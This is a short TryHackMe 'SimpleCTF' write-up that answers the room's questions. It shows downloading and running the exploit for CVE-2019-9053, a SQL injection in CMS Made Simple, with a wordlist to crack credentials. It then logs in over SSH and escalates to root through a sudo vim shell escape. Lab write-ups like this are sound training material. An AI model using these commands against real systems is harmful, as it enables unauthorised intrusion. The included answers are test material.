TryHackMe - SimpleCTF
Last updated
Last updated
We take it in our kali wget https://www.exploit-db.com/download/46635
But we can also try to check if the creds would work with ssh (Remember to specify the port in your ssh command because it is not on default 22 port)
ssh mitch@10.10.104.30 -p 2222
sudo -l
we find out that vim is allowed
How many services are running under port 1000?
Answer 2
What is running on the higher port?
Answer ssh
What's the CVE you're using against the application?
Answer CVE-2019-9053
reading the exploit we understand that the app is vulnerable to a time based SQL injection.
To what kind of vulnerability is the application vulnerable?
Answer SQLi
What's the password?
I will let you find this on your own
Where can you login with the details obtained?
Answer ssh
What's the user flag?
I will let you find this on your own. Hint: cat user.txt
Is there any other user in the home directory? What's its name?
We do an ls /home
and we find the user sunbath
What can you leverage to spawn a privileged shell?
Answer vim
What's the root flag?
I will let you find this on your own. Hint: cat /root/root.txt
We find a page using CMS made simple that has a cve. We can try this
python 46635 -u http://10.10.61.2/simple/ --crack -w /usr/share/seclists/Passwords/Common-Credentials/best110.txt
Once the credentials found we can login here http://10.10.61.2/simple/admin/login.php
We can do this trick sudo vim -c ':!/bin/bash'
I just changed it to get a bash shell
It works